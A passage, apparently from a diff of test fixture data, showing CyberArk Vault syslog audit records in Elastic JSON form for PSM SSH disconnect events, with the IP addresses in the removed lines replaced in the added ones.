Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM 